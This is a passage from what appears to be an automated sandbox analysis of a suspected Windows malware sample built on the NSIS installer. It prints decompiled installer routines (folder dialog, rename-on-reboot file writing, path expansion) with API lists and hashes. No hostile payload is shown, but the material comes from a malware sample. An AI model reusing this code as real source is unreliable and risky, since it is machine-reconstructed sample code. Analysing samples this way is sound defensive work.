									}
								}
								_t147 =  *0x42e3fc; // 0x6e1cac
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040473D(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429058);
									} else {
										E00404678(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42ecc4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403EA5(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a08c == _t158) {
									E00404256();
								}
								 *0x42a08c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a0a0;
							_v60 = E00404612;
							_v56 = _t146;
							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004056BA(_t146);
								_t124 =  *0x42ec30; // 0x6dc460
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
										lstrcatA(_t146, 0x42dbc0);
									}
								}
								 *0x42a08c =  *0x42a08c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
						E004056BA(_t146);
					}
					 *0x42e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E83(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E83(_t166);
					E00403EB8(_t165);
					_t138 = E00405F57(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EEA(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                                            0x004042c1
                                                                                            0x004042c7
                                                                                            0x004042cd
                                                                                            0x004042da
                                                                                            0x004042e8
                                                                                            0x004042eb
                                                                                            0x004042f3
                                                                                            0x004042f9
                                                                                            0x004042f9
                                                                                            0x00404305
                                                                                            0x00404308
                                                                                            0x00404376
                                                                                            0x0040437d
                                                                                            0x00404454
                                                                                            0x0040445b
                                                                                            0x0040446a
                                                                                            0x0040446a
                                                                                            0x0040446e
                                                                                            0x00404478
                                                                                            0x00404485
                                                                                            0x00404487
                                                                                            0x00404487
                                                                                            0x00404495
                                                                                            0x0040449c
                                                                                            0x004044a3
                                                                                            0x004044a6
                                                                                            0x004044dd
                                                                                            0x004044df
                                                                                            0x004044e5
                                                                                            0x004044ea
                                                                                            0x004044ee
                                                                                            0x004044f0
                                                                                            0x004044f0
                                                                                            0x0040450c
                                                                                            0x00000000
                                                                                            0x0040450e
                                                                                            0x00404511
                                                                                            0x0040451f
                                                                                            0x00404525
                                                                                            0x00404526
                                                                                            0x00404529
                                                                                            0x0040452c
                                                                                            0x00000000
                                                                                            0x0040452c
                                                                                            0x004044a8
                                                                                            0x004044aa
                                                                                            0x004044ae
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004044b0
                                                                                            0x004044b0
                                                                                            0x004044bd
                                                                                            0x004044c2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004044c6
                                                                                            0x004044c8
                                                                                            0x004044c8
                                                                                            0x004044d3
                                                                                            0x004044d6
                                                                                            0x004044db
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004044db
                                                                                            0x00404538
                                                                                            0x00404542
                                                                                            0x00404545
                                                                                            0x00404548
                                                                                            0x0040454f
                                                                                            0x0040454f
                                                                                            0x00404551
                                                                                            0x00404551
                                                                                            0x00404556
                                                                                            0x00404558
                                                                                            0x00404560
                                                                                            0x00404567
                                                                                            0x00404569
                                                                                            0x00404574
                                                                                            0x00404574
                                                                                            0x00404569
                                                                                            0x0040457b
                                                                                            0x00404584
                                                                                            0x0040458e
                                                                                            0x00404596
                                                                                            0x004045b1
                                                                                            0x00404598
                                                                                            0x004045a1
                                                                                            0x004045a1
                                                                                            0x00404596
                                                                                            0x004045b6
                                                                                            0x004045bb
                                                                                            0x004045c0
                                                                                            0x004045c9
                                                                                            0x004045c9
                                                                                            0x004045d2
                                                                                            0x004045d4
                                                                                            0x004045d4
                                                                                            0x004045e0
                                                                                            0x004045e8
                                                                                            0x004045f2
                                                                                            0x004045f2
                                                                                            0x004045f7
                                                                                            0x00000000
                                                                                            0x004045f7
                                                                                            0x004044a6
                                                                                            0x0040445d
                                                                                            0x00404464
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404464
                                                                                            0x00404383
                                                                                            0x0040438c
                                                                                            0x004043a6
                                                                                            0x004043ab
                                                                                            0x004043b5
                                                                                            0x004043bc
                                                                                            0x004043c8
                                                                                            0x004043cb
                                                                                            0x004043ce
                                                                                            0x004043d5
                                                                                            0x004043dd
                                                                                            0x004043e0
                                                                                            0x004043e4
                                                                                            0x004043eb
                                                                                            0x004043f3
                                                                                            0x0040444d
                                                                                            0x004043f5
                                                                                            0x004043f6
                                                                                            0x004043fd
                                                                                            0x00404402
                                                                                            0x00404407
                                                                                            0x0040440f
                                                                                            0x0040441c
                                                                                            0x00404430
                                                                                            0x00404434
                                                                                            0x00404434
                                                                                            0x00404430
                                                                                            0x00404439
                                                                                            0x00404446
                                                                                            0x00404446
                                                                                            0x004043f3
                                                                                            0x00000000
                                                                                            0x004043ab
                                                                                            0x00404399
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040439f
                                                                                            0x00000000
                                                                                            0x0040430a
                                                                                            0x00404317
                                                                                            0x00404320
                                                                                            0x0040432d
                                                                                            0x0040432d
                                                                                            0x00404334
                                                                                            0x0040433a
                                                                                            0x00404343
                                                                                            0x00404346
                                                                                            0x00404349
                                                                                            0x00404351
                                                                                            0x00404354
                                                                                            0x00404357
                                                                                            0x0040435d
                                                                                            0x00404364
                                                                                            0x0040436b
                                                                                            0x004045fd
                                                                                            0x0040460f
                                                                                            0x00404371
                                                                                            0x00404374
                                                                                            0x00000000
                                                                                            0x00404374
                                                                                            0x0040436b

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00404310
                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                                                                            • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                                                                            • lstrcmpiA.KERNEL32(gqeqcda,0042A0A0,00000000,?,?), ref: 00404428
                                                                                            • lstrcatA.KERNEL32(?,gqeqcda), ref: 00404434
                                                                                            • SetDlgItemTextA.USER32 ref: 00404446
                                                                                              • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                                                                                              • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                              • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                              • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                              • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                            • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                                                                              • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                              • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                                                                              • Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp$gqeqcda
                                                                                            • API String ID: 2624150263-2210883770
                                                                                            • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                            • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                                                                            • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                            • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405915, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E00405915(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F57(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ecb0 =  *0x42ecb0 + 1;
						return _t20;
					}
				}
				 *0x42c230 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
						_t18 =  *0x42ec30; // 0x6dc460
						_t56 = _t55 + 0x10;
						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405813(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405BC7(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040589E(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                                                            0x0040591b
                                                                                            0x00405922
                                                                                            0x00405926
                                                                                            0x0040592f
                                                                                            0x00405933
                                                                                            0x00405a72
                                                                                            0x00405a72
                                                                                            0x00000000
                                                                                            0x00405a72
                                                                                            0x00405933
                                                                                            0x0040593f
                                                                                            0x00405955
                                                                                            0x0040597d
                                                                                            0x00405988
                                                                                            0x0040598c
                                                                                            0x004059ac
                                                                                            0x004059ae
                                                                                            0x004059b3
                                                                                            0x004059bd
                                                                                            0x004059ca
                                                                                            0x004059cf
                                                                                            0x004059d4
                                                                                            0x004059d8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004059e7
                                                                                            0x004059e9
                                                                                            0x004059f6
                                                                                            0x004059fa
                                                                                            0x00405a6b
                                                                                            0x00405a6c
                                                                                            0x00000000
                                                                                            0x00405a16
                                                                                            0x00405a23
                                                                                            0x00405a88
                                                                                            0x00405a8f
                                                                                            0x00405a36
                                                                                            0x00405a36
                                                                                            0x00405a38
                                                                                            0x00405a41
                                                                                            0x00405a4c
                                                                                            0x00405a5e
                                                                                            0x00405a65
                                                                                            0x00000000
                                                                                            0x00405a65
                                                                                            0x00405a91
                                                                                            0x00405a92
                                                                                            0x00405a97
                                                                                            0x00405a99
                                                                                            0x00405aa6
                                                                                            0x00405aa6
                                                                                            0x00405aaa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405a9b
                                                                                            0x00405a9b
                                                                                            0x00405a9e
                                                                                            0x00405aa1
                                                                                            0x00405aa2
                                                                                            0x00000000
                                                                                            0x00405a9b
                                                                                            0x00405a2e
                                                                                            0x00405a33
                                                                                            0x00000000
                                                                                            0x00405a33
                                                                                            0x004059fa
                                                                                            0x00405957
                                                                                            0x00405962
                                                                                            0x0040596b
                                                                                            0x0040596f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040596f
                                                                                            0x00405a7c

                                                                                            APIs
                                                                                              • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                              • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                                                                            • GetShortPathNameA.KERNEL32 ref: 0040596B
                                                                                            • GetShortPathNameA.KERNEL32 ref: 00405988
                                                                                            • wsprintfA.USER32 ref: 004059A6
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                                                                            • GlobalFree.KERNEL32 ref: 00405A65
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                                                                              • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                              • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                            • String ID: %s=%s$[Rename]
                                                                                            • API String ID: 3445103937-1727408572
                                                                                            • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                            • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                                                                            • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                            • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405BE9, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 74%
                                                                                            			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42e3fc; // 0x6e1cac
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x42ec58; // 0x6e07e0
				_t74 = _t73 + _t36;
				_t37 = 0x42dbc0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x42dbc0;
				if(_a4 - 0x42dbc0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x42dbc0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x42f000;
							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
						} else {
							E00405B25(_t86,  *0x42ec28);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405E29(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42eca4;
						if( *0x42eca4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x42ec24; // 0x73e81340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BE9(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405BC7(_a4, _t37);
			}






























                                                                                            0x00405be9
                                                                                            0x00405be9
                                                                                            0x00405be9
                                                                                            0x00405bef
                                                                                            0x00405bf4
                                                                                            0x00405bf6
                                                                                            0x00405c05
                                                                                            0x00405c05
                                                                                            0x00405c07
                                                                                            0x00405c10
                                                                                            0x00405c12
                                                                                            0x00405c17
                                                                                            0x00405c1a
                                                                                            0x00405c1b
                                                                                            0x00405c22
                                                                                            0x00405c24
                                                                                            0x00405c2a
                                                                                            0x00405c2d
                                                                                            0x00405c2d
                                                                                            0x00405e06
                                                                                            0x00405e06
                                                                                            0x00405e0a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405c3a
                                                                                            0x00405c40
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405c46
                                                                                            0x00405c47
                                                                                            0x00405c4a
                                                                                            0x00405c4d
                                                                                            0x00405df9
                                                                                            0x00405e03
                                                                                            0x00405e05
                                                                                            0x00405e05
                                                                                            0x00405dfb
                                                                                            0x00405dfd
                                                                                            0x00405dff
                                                                                            0x00405e00
                                                                                            0x00405e00
                                                                                            0x00000000
                                                                                            0x00405df9
                                                                                            0x00405c53
                                                                                            0x00405c57
                                                                                            0x00405c67
                                                                                            0x00405c6b
                                                                                            0x00405c72
                                                                                            0x00405c75
                                                                                            0x00405c79
                                                                                            0x00405c7f
                                                                                            0x00405c82
                                                                                            0x00405c85
                                                                                            0x00405c88
                                                                                            0x00405da3
                                                                                            0x00405da6
                                                                                            0x00405dd6
                                                                                            0x00405dd9
                                                                                            0x00405dde
                                                                                            0x00405de2
                                                                                            0x00405de2
                                                                                            0x00405de7
                                                                                            0x00405de8
                                                                                            0x00405ded
                                                                                            0x00405df0
                                                                                            0x00405df2
                                                                                            0x00000000
                                                                                            0x00405df2
                                                                                            0x00405da8
                                                                                            0x00405dab
                                                                                            0x00405dc0
                                                                                            0x00405dc7
                                                                                            0x00405dad
                                                                                            0x00405db4
                                                                                            0x00405db4
                                                                                            0x00405dcf
                                                                                            0x00405dd2
                                                                                            0x00405d9b
                                                                                            0x00405d9c
                                                                                            0x00405d9c
                                                                                            0x00000000
                                                                                            0x00405dd2
                                                                                            0x00405c90
                                                                                            0x00405c91
                                                                                            0x00405c97
                                                                                            0x00405c99
                                                                                            0x00405cb3
                                                                                            0x00405cb3
                                                                                            0x00405cba
                                                                                            0x00405cba
                                                                                            0x00405cc1
                                                                                            0x00405cc5
                                                                                            0x00405cc5
                                                                                            0x00405cc6
                                                                                            0x00405cc8
                                                                                            0x00405d01
                                                                                            0x00405d04
                                                                                            0x00405d14
                                                                                            0x00405d17
                                                                                            0x00405d1f
                                                                                            0x00405d25
                                                                                            0x00405d25
                                                                                            0x00405d81
                                                                                            0x00405d81
                                                                                            0x00405d83
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d29
                                                                                            0x00405d30
                                                                                            0x00405d31
                                                                                            0x00405d33
                                                                                            0x00405d4d
                                                                                            0x00405d5b
                                                                                            0x00405d61
                                                                                            0x00405d63
                                                                                            0x00405d7e
                                                                                            0x00405d7e
                                                                                            0x00405d7e
                                                                                            0x00000000
                                                                                            0x00405d7e
                                                                                            0x00405d69
                                                                                            0x00405d74
                                                                                            0x00405d7a
                                                                                            0x00405d7c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d7c
                                                                                            0x00405d35
                                                                                            0x00405d38
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d47
                                                                                            0x00405d49
                                                                                            0x00405d4b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d4b
                                                                                            0x00000000
                                                                                            0x00405d81
                                                                                            0x00405d0c
                                                                                            0x00000000
                                                                                            0x00405cca
                                                                                            0x00405ccf
                                                                                            0x00405ce5
                                                                                            0x00405cea
                                                                                            0x00405ced
                                                                                            0x00405d8a
                                                                                            0x00405d8a
                                                                                            0x00405d8e
                                                                                            0x00405d96
                                                                                            0x00405d96
                                                                                            0x00000000
                                                                                            0x00405d8e
                                                                                            0x00405cf7
                                                                                            0x00405d85
                                                                                            0x00405d85
                                                                                            0x00405d88
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d88
                                                                                            0x00405cc8
                                                                                            0x00405c9b
                                                                                            0x00405c9f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ca1
                                                                                            0x00405ca5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ca7
                                                                                            0x00405cab
                                                                                            0x00000000
                                                                                            0x00405cad
                                                                                            0x00405cad
                                                                                            0x00000000
                                                                                            0x00405cad
                                                                                            0x00405cab
                                                                                            0x00405e10
                                                                                            0x00405e1a
                                                                                            0x00405e26
                                                                                            0x00405e26
                                                                                            0x00000000

                                                                                            APIs
